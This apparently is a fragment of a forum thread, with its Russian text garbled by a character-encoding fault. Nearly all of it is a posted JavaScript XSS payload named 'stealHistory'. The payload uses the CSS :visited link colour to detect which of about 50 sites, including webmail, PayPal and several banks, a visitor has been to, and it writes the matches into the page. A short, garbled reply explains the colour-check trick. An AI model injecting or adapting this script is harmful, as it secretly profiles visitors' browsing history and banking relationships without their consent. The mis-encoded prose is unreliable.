|
|
|
|
|
Ñàáæ.
| Êîä: |
|
<script>var agent = navigator.userAgent.toLowerCase();var is_mozilla = (agent.indexOf("mozilla") != -1);// popular websites. Lookup if user has visited any.var websites = [ "http://login.yahoo.com/", "http://www.jailbabes.com", "http://ha.ckers.org", "http://seoblackhat.com", "http://www.cgisecurity.com", "http://www.spidynamics.com", "http://www.cenzic.com", "http://www.watchfire.com", "http://www.ntobjectives.com", "http://www.webappsec.org", "http://www.whitehatsec.com", "http://english.aljazeera.net/HomePage", "http://mail.google.com/", "http://mail.yahoo.com/", "http://my.yahoo.com/", "http://slashdot.org/", "http://www.myspace.com/", "http://www.amazon.com/", "http://www.aol.com/", "http://www.bankofamerica.com/", "http://www.bankone.com/", "http://www.blackhat.com/", "http://www.blogger.com/", "http://www.bofa.com/", "http://www.capitalone.com/", "http://www.chase.com/", "http://www.citibank.com/", "http://www.cnn.com/", "http://www.comerica.com/", "http://www.e-gold.com/", "http://www.ebay.com/", "http://www.etrade.com/", "http://www.google.com/", "http://www.hsbc.com/", "http://www.icq.com/", "http://www.microsoft.com/", "http://www.msn.com/", "http://www.myspace.com/", "http://www.passport.net/", "http://www.paypal.com/", "http://www.sourceforge.net/", "http://www.statefarm.com/", "http://www.usbank.com/", "http://www.wachovia.com/", "http://www.wamu.com/", "http://www.wellsfargo.com/", "http://www.xanga.com/", "http://www.yahoo.com/", "https://commerce.blackhat.com/", "https:/banking.wellsfargo.com/",];/* prevent multiple XSS loads */if (! document.getElementById('xss_flag')) { var d = document.createElement('div'); d.id = 'xss_flag'; document.body.appendChild(d); var d = document.createElement('table'); d.border = 0; d.cellpadding = 5; d.cellspacing = 10; d.width = '90%'; d.align = 'center'; d.id = 'data'; document.body.appendChild(d); document.write('<style>'); for (var i = 0; i < websites.length; i++) { document.write('#id' + i + ":visited {color: #0000FF;}"); } document.write('</style>'); /* launch steal history */if (is_mozilla) {stealHistory(); } }/*--- [method: stealHistory] -------------------------------------------## Description: Send a browsers history to an off-domain URL. #-----------------------------------------------------------------------*/function stealHistory() { // loop through websites and check which ones have been visited for (var i = 0; i < websites.length; i++) { var link = document.createElement("a"); link.id = "id" + i; link.href = websites[i]; link.innerHTML = websites[i]; document.body.appendChild(link); var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color"); document.body.removeChild(link); // check for visited if (color == "rgb(0, 0, 255)") { document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>'); } // end visited check } // end visited website loop } // end stealHistory method</script>
|
|
|
|
|
|
|
|
|
| äà, îí ïðîâåðÿåò, êàêèì öâåòîì íàðèñîâàëèñü ññûëêè, åñëè öâåòîì link:visited - çíà÷èò, þçåð áûë íà ýòîì ñàéòå... |
|
|
|
|
|
|
|
|
